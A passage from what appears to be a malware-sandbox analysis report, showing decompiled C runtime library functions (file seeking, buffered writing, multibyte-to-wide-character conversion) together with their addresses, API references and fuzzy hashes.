										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}

0x0040c748
0x0040c748
0x0040c752
0x0040c755
0x0040c757
0x0040c759
0x0040c77c
0x0040c781
0x0040c785
0x0040c788
0x0040c78a
0x0040c78a
0x0040c78d
0x0040c78f
0x0040c790
0x0040c791
0x0040c799
0x0040c79b
0x0040c79e
0x0040c773
0x00000000
0x0040c7a0
0x0040c7a0
0x0040c7a3
0x0040c7a9
0x0040c7b3
0x0040c7b5
0x0040c7b8
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c806
0x0040c808
0x0040c7f9
0x0040c7f9
0x0040c7fc
0x0040c81a
0x0040c81e
0x0040c8d8
0x0040c8de
0x0040c8de
0x0040c8e0
0x00000000
0x0040c8e0
0x0040c824
0x0040c827
0x0040c829
0x0040c843
0x0040c84a
0x0040c84f
0x0040c852
0x0040c857
0x0040c8d2
0x0040c8d5
0x0040c8d5
0x0040c8d5
0x00000000
0x0040c8d5
0x0040c859
0x0040c85b
0x0040c85d
0x0040c868
0x0040c86b
0x0040c88d
0x0040c88f
0x0040c892
0x0040c895
0x0040c89d
0x0040c89f
0x0040c8a6
0x0040c8ab
0x0040c8ae
0x0040c8c0
0x0040c8c0
0x0040c8c3
0x0040c8c3
0x0040c8c8
0x0040c8cd
0x0040c8cd
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x00000000
0x0040c8cd
0x0040c8b0
0x0040c8b3
0x0040c8b6
0x00000000
0x00000000
0x0040c8b8
0x0040c8be
0x00000000
0x00000000
0x00000000
0x0040c8be
0x0040c8a1
0x0040c8a1
0x00000000
0x0040c8a1
0x0040c86d
0x0040c873
0x0040c880
0x0040c880
0x0040c882
0x00000000
0x00000000
0x0040c877
0x0040c87a
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87f
0x0040c87f
0x0040c87f
0x0040c884
0x00000000
0x0040c884
0x0040c82b
0x00000000
0x0040c82b
0x0040c7fe
0x00000000
0x0040c7fe
0x0040c80a
0x0040c80f
0x00000000
0x0040c80f
0x0040c7ce
0x0040c7d8
0x0040c7db
0x0040c7e0
0x00000000
0x00000000
0x0040c7e2
0x0040c7e4
0x0040c7e6
0x00000000
0x00000000
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ed
0x0040c7ef
0x0040c7f2
0x0040c7f2
0x0040c7f2
0x0040c7f4
0x0040c7f5
0x0040c7f5
0x00000000
0x0040c7ea
0x00000000
0x0040c7ab
0x0040c79e
0x0040c75b
0x0040c760
0x0040c761
0x0040c762
0x0040c763
0x0040c764
0x0040c765
0x0040c76b
0x00000000

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 0066BD11 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0066BDD5
__fileno.LIBCMT ref: 0066BDF5
__locking.LIBCMT ref: 0066BDFC
__flsbuf.LIBCMT ref: 0066BE27

Part of subcall function 0066C228: __getptd_noexit.LIBCMT ref: 0066C228

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: __fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 1291973410-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: d6ed28063667fa7440dff720e892143b03953f116774b7232dbf7fb9f5e1e599
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: 6E41B531A00608EBDB249F69C8845EEB7B7EF80760F24A56DE555DB240E771DE818B44

Uniqueness

Uniqueness Score: -1.00%

Function 00665F67 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00665FBB
_memset.LIBCMT ref: 00665FD6
_fseek.LIBCMT ref: 00666044

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: e876286eb6cde568269fa34e1184cc7b538c064472cb24b8d72c4d713f8389aa
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: 3341A372604B518BD7708A2DFA05757B2E7AF80364F140A3DF5A6C67D0EB31E885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
															if(_t48 > 0) {
																continue;
															} else {
																goto L38;
															}
															goto L41;
														}
														goto L39;
													}
												} else {
													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
													_t55 = _t55 + 4;
													_t53[0x12] = _t30;
													__eflags = _t30;
													if(_t30 == 0) {
														goto L39;
													} else {
														goto L30;
													}
												}
											}
										}
									} else {
										_push(0);
										_push(_t48);
										_push(_t53[0x10]);
										_t53[0x1b] = 0xffffffff;
										_t53[1] = 0;
										 *_t53 = _t53[0x11];
										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
										__eflags = _t30;
										if(_t30 < 0) {
											goto L39;
										} else {
											_t53[0x1a] = _t48;
											_t53[0x19] = _t48;
											return _t48;
										}
									}
								}
							} else {
								if(_t43 == 0) {
									_t48 = _t48 - _t53[0x19];
								}
								if(_t48 < 0) {
									L39:
									_t32 = _t30 | 0xffffffff;
									__eflags = _t32;
									return _t32;
								} else {
									if(_t53[0x11] != 0) {
										L11:
										if(_t48 <= 0) {
											L17:
											return _t53[0x19];
										} else {
											while(1) {
												_t39 = 0x4000;
												if(_t48 < 0x4000) {
													_t39 = _t48;
												}
												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
												_t55 = _t55 + 0xc;
												if(_t30 == 0) {
													goto L39;
												}
												_t48 = _t48 - _t30;
												if(_t48 > 0) {
													continue;
												} else {
													goto L17;
												}
												goto L41;
											}
											goto L39;
										}
									} else {
										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
										_t57 = _t55 + 4;
										_t53[0x11] = _t30;
										if(_t30 == 0) {
											goto L39;
										} else {
											E0040BA30(_t48, _t30, 0, 0x4000);
											_t55 = _t57 + 0xc;
											goto L11;
										}
									}
								}
							}
						}
					}
				}
				L41:
			}

0x00405d00
0x00405d00
0x00405d00
0x00405d01
0x00405d07
0x00405e7f
0x00405e7f
0x00405e7f
0x00405e83
0x00405d0d
0x00405d0d
0x00405d14
0x00000000
0x00405d1a
0x00405d1a
0x00405d20
0x00000000
0x00405d2f
0x00405d34
0x00405d38
0x00405dad
0x00405db0
0x00405db2
0x00405db2
0x00405db2
0x00405db5
0x00405db7
0x00000000
0x00405dbd
0x00405dbd
0x00405dc1
0x00405df8
0x00405dfb
0x00405dfd
0x00405e04
0x00405e09
0x00405e0c
0x00405e0e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405dff
0x00405dff
0x00405e10
0x00405e10
0x00405e12
0x00405e73
0x00405e78
0x00405e14
0x00405e14
0x00405e18
0x00405e2e
0x00405e2e
0x00405e32
0x00405e34
0x00405e37
0x00405e38
0x00405e3c
0x00405e43
0x00405e45
0x00405e45
0x00405e43
0x00405e4c
0x00405e4e
0x00000000
0x00405e50
0x00405e50
0x00405e50
0x00405e55
0x00405e57
0x00405e59
0x00405e59
0x00405e61
0x00405e66
0x00405e69
0x00405e6b
0x00000000
0x00000000
0x00405e6d
0x00405e6f
0x00405e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e71
0x00000000
0x00405e50
0x00405e1a
0x00405e1f
0x00405e24
0x00405e27
0x00405e2a
0x00405e2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2c
0x00405e18
0x00405e12
0x00405dc3
0x00405dc9
0x00405dcb
0x00405dcc
0x00405dcd
0x00405dd4
0x00405ddb
0x00405ddd
0x00405de5
0x00405de7
0x00000000
0x00405ded
0x00405ded
0x00405df0
0x00405df7
0x00405df7
0x00405de7
0x00405dc1
0x00405d3a
0x00405d3c
0x00405d3e
0x00405d3e
0x00405d43
0x00405e79
0x00405e7a
0x00405e7a
0x00405e7e
0x00405d49
0x00405d4d
0x00405d77
0x00405d79
0x00405da7
0x00405dac
0x00405d7b
0x00405d80
0x00405d80
0x00405d87
0x00405d89
0x00405d89
0x00405d91
0x00405d96
0x00405d9b
0x00000000
0x00000000
0x00405da1
0x00405da5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405da5
0x00000000
0x00405d80
0x00405d4f
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00000000
0x00405d67
0x00405d6f
0x00405d74
0x00000000
0x00405d74
0x00405d61
0x00405d4d
0x00405d43
0x00405d38
0x00405d20
0x00405d14
0x00000000

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040baaa
0x0040baba
0x0040bae0
0x00000000
0x0040bac1
0x0040bac1
0x0040bac4
0x0040bac6
0x0040bae7
0x0040baea
0x0040baec
0x00000000
0x00000000
0x0040baee
0x0040baf3
0x0040baf6
0x0040baf9
0x00000000
0x00000000
0x0040bafe
0x0040bb02
0x0040bb09
0x0040bb0c
0x0040bb0f
0x0040bb11
0x0040bb1b
0x0040bb13
0x0040bb16
0x0040bb16
0x0040bb22
0x0040bb24
0x0040bbe9
0x00000000
0x0040bb2a
0x0040bb2a
0x0040bb2d
0x0040bb2d
0x0040bb33
0x0040bb64
0x0040bb64
0x0040bb67
0x0040bbc0
0x0040bbc7
0x0040bbca
0x0040bbf5
0x0040bbf5
0x0040bbf7
0x00000000
0x0040bbfb
0x0040bbcc
0x0040bbcf
0x0040bbd2
0x0040bbd3
0x0040bbd6
0x0040bbd8
0x0040bbda
0x0040bbda
0x00000000
0x0040bbd8
0x0040bb69
0x0040bb6b
0x0040bb78
0x0040bb78
0x0040bb7c
0x0040bb7e
0x0040bb82
0x0040bb84
0x0040bb87
0x0040bb87
0x0040bb87
0x0040bb89
0x0040bb8a
0x0040bb94
0x0040bb95
0x0040bb9a
0x0040bb9d
0x0040bba0
0x0040bc03
0x0040bc03
0x0040bc07
0x00000000
0x0040bba2
0x0040bba2
0x0040bba4
0x0040bba6
0x0040bba8
0x0040bba8
0x0040bbaa
0x0040bbad
0x0040bbaf
0x0040bbb1
0x00000000
0x0040bbb3
0x0040bbb3
0x0040bbb3
0x00000000
0x0040bbb3
0x0040bbb1
0x0040bba0
0x0040bb6e
0x0040bb74
0x0040bb76
0x00000000
0x00000000
0x00000000
0x0040bb76
0x0040bb35
0x0040bb38
0x0040bb3a
0x00000000
0x00000000
0x0040bb3c
0x0040bbf1
0x0040bbf1
0x0040bbf1
0x00000000
0x0040bbf1
0x0040bb42
0x0040bb44
0x0040bb46
0x0040bb48
0x0040bb48
0x0040bb50
0x0040bb55
0x0040bb58
0x0040bb5a
0x0040bb5d
0x0040bb5f
0x00000000
0x0040bbe1
0x0040bbe1
0x0040bbe1
0x00000000
0x0040bb2a
0x0040bb24
0x0040bac8
0x0040bac8
0x0040bacd
0x0040bace
0x0040bacf
0x0040bad0
0x0040bad1
0x0040bad2
0x0040bad8
0x00000000
0x0040badd

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 00675506 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0067553A
__isleadbyte_l.LIBCMT ref: 0067556E
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0067559F
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0067560D

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: f4bc9059abe14627da1e7f13b205da00697422017ad6babe850f41a0a3fa00c7
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 4C318F71A10685EFEB20DF64C8849BE7BA7EF01311B18C5E9F46A8B2A1E771D940DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004152a9
0x004152b0
0x004152c7
0x00000000
0x004152b7
0x004152b9
0x004152d3
0x004152d8
0x004152db
0x004152de
0x00415307
0x0041530e
0x00415310
0x00415391
0x004153ac
0x004153ae
0x004152ee
0x004152ee
0x004152f1
0x004152f3
0x004152f6
0x004152f6
0x004152f6
0x004152f6
0x00000000
0x004152fc
0x00415370
0x00415370
0x00415375
0x0041537b
0x0041537e
0x00415380
0x00415383
0x00415383
0x00415383
0x00415383
0x00000000
0x00415387
0x00415312
0x00415315
0x0041531b
0x0041531e
0x00415345
0x00415348
0x0041534e
0x00000000
0x00000000
0x00415350
0x00415353
0x00000000
0x00000000
0x00415355
0x00415355
0x0041535b
0x0041535e
0x004152cc
0x004152cc
0x00415367
0x00000000
0x00415367
0x00415320
0x00415323
0x00000000
0x00000000
0x00415327
0x00415338
0x0041533e
0x00415340
0x00415343
0x00000000
0x00000000
0x00000000
0x00415343
0x004152e0
0x004152e3
0x004152e5
0x004152eb
0x004152eb
0x00000000
0x004152bb
0x004152bb
0x004152c0
0x004152c4
0x004152c4
0x00000000
0x004152c0
0x004152b9

APIs

